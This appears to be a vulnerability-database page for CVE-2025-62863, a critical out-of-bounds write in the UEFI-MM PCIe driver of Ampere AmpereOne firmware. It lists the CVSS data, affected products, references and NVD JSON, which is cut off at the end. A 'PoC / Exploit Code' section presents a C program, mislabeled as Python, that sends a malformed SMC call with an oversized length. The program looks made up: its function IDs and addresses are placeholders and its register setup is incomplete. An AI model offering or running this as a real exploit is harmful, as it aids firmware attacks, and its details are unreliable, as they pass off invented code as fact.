CVE-2025-62863

Description

Ampere AmpereOne AC03 devices before 3.5.9.3, AmpereOne AC04 devices before 4.4.5.2, and AmpereOne M devices before 5.4.5.1 allow an incorrectly formed SMC call to UEFI-MM PCIe driver that could result in an out-of-bounds write within PCIe driver’s S-EL0 address space.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:amperecomputing:ampereone_a192-32m_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:amperecomputing:ampereone_a192-32m:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:amperecomputing:ampereone_a192-26m_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:amperecomputing:ampereone_a192-26m:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:amperecomputing:ampereone_a160-28m_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:amperecomputing:ampereone_a160-28m:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:amperecomputing:ampereone_a144-33m_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:amperecomputing:ampereone_a144-33m:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:amperecomputing:ampereone_a144-26m_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:amperecomputing:ampereone_a144-26m:-:*:*:*:*:*:*:* - NOT VULNERABLE

Ampere AmpereOne AC03 < 3.5.9.3

Ampere AmpereOne AC04 < 4.4.5.2

Ampere AmpereOne M < 5.4.5.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-62863 PoC - Malformed SMC Call Trigger
// This PoC demonstrates sending a malformed SMC call to trigger OOB write

#include <stdio.h>
#include <stdint.h>

// SMC Function IDs for Ampere AmpereOne
#define SMC_PCIE_CALL     0xC4000001
#define SMC_PCIE_WRITE    0xC4000002
#define SMC_PCIE_READ     0xC4000003

// Malformed SMC structure to trigger OOB write
struct malformed_smc {
    uint64_t func_id;      // Function ID
    uint64_t arg0;         // First argument (buffer pointer)
    uint64_t arg1;         // Second argument (size - maliciously large)
    uint64_t arg2;         // Third argument (destination address)
    uint64_t arg3;         // Fourth argument
};

// Trigger the vulnerability
void trigger_cve_2025_62863(void) {
    struct malformed_smc exploit_smc = {
        .func_id = SMC_PCIE_WRITE,
        .arg0 = 0x1000,           // Source buffer
        .arg1 = 0xFFFFFFFF,       // Oversized size (triggers OOB)
        .arg2 = 0x2000,           // Destination in S-EL0 space
        .arg3 = 0
    };
    
    // Execute malformed SMC call
    register uint64_t x0 asm("x0") = exploit_smc.func_id;
    register uint64_t x1 asm("x1") = exploit_smc.arg0;
    register uint64_t x2 asm("x2") = exploit_smc.arg1;
    register uint64_t x3 asm("x3") = exploit_smc.arg2;
    
    asm volatile("smc #0" : : "r"(x0), "r"(x1), "r"(x2), "r"(x3));
}

int main() {
    printf("CVE-2025-62863 PoC - Ampere AmpereOne SMC OOB Write\n");
    printf("Target: AmpereOne AC03/AC04/M devices\n");
    printf("Vulnerability: Malformed SMC call in UEFI-MM PCIe driver\n");
    trigger_cve_2025_62863();
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-62863
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-62863
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-62863/
[4] VulDB https://vuldb.com/cve/CVE-2025-62863
[5] https://amperecomputing.com/products/product-security
[6] https://amperecomputing.com/products/security-bulletins/amp-sb-0007

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-62863", "sourceIdentifier": "[email protected]", "published": "2025-12-16T18:16:13.493", "lastModified": "2026-01-13T20:57:29.577", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Ampere AmpereOne AC03 devices before 3.5.9.3, AmpereOne AC04 devices before 4.4.5.2, and AmpereOne M devices before 5.4.5.1 allow an incorrectly formed SMC call to UEFI-MM PCIe driver that could result in an out-of-bounds write within PCIe driver’s S-EL0 address space."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:amperecomputing:ampereone_a192-32m_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.4.5.1", "matchCriteriaId": "A9523999-81AB-47DD-B8D5-A352FE3B1D5B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:amperecomputing:ampereone_a192-32m:-:*:*:*:*:*:*:*", "matchCriteriaId": "2384E36F-8268-404E-80D6-C98E3EA1C299"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:amperecomputing:ampereone_a192-26m_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.4.5.1", "matchCriteriaId": "A13FFFC6-7355-4F15-B1AC-A1F8D71A4AD1"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:amperecomputing:ampereone_a192-26m:-:*:*:*:*:*:*:*", "matchCriteriaId": "F9EBCAD2-E1D0-40FC-8791-AD0F50EEBE50"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:amperecomputing:ampereone_a160-28m_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.4.5.1", "matchCriteriaId": "54A0E3ED-F092-448D-8ACE-A0A16C4B451E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:amperecomputing:ampereone_a160-28m:-:*:*:*:*:*:*:*", "matchCriteriaId": "1E5723F8-301B-49B1-8968-1337689146DE"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:amperecomputing:ampereone_a144-33m_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.4.5.1", "matchCriteriaId": "6996EFF6-6CF0-44B9-997F-A3C721D0CDA2"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:amperecomputing:ampereone_a144-33m:-:*:*:*:*:*:*:*", "matchCriteriaId": "45C2645C-B01C-4070-A1D0-32D614028AD3"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:amperecomputing:ampereone_a144-26m_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.4.5.1", "matchCriteriaId": "90C08FC4-2D5F-4E67-88AB-A82A1C0D60EC"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:amperecomputing:ampereone_a144-26m:-:*:*:*:*:*:*:*", "matchCriteriaId": "A1766FF3-1D99-4FED-AC42-E0954FCCBF0C"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:amperecomputing:ampereone_a96-36m_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.4.5.1", "matchCriteriaId": "753CE183-4807-4C99-8BD4-43B57C5A44D6"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:amperecomputing:ampereone_a96-36m:-:*:*:*:*:*:*:*", "matchCriteriaId": "1E84F28F-985D-4A5F-9A4E-49B7A39F913E"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:amperecomputing:ampereone_a96-36x_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.4.5.2", "matchCriteriaId": "851C8C9F-5FFB-451D-95CC-75A8CDAEC59B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:amperecomputing:ampereone_a96-36x:-:*:*:*:*:*:*:*", "matchCriteriaId": "2A293338-7B91-4536-BE77-7A1FE411DFBC"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:amperecomputing:ampereone_a128-34x_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.4.5.2", "matchCriteriaId": "D2A240BF-86B5-4681-9347-E871369AE3AA"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2. ... (truncated)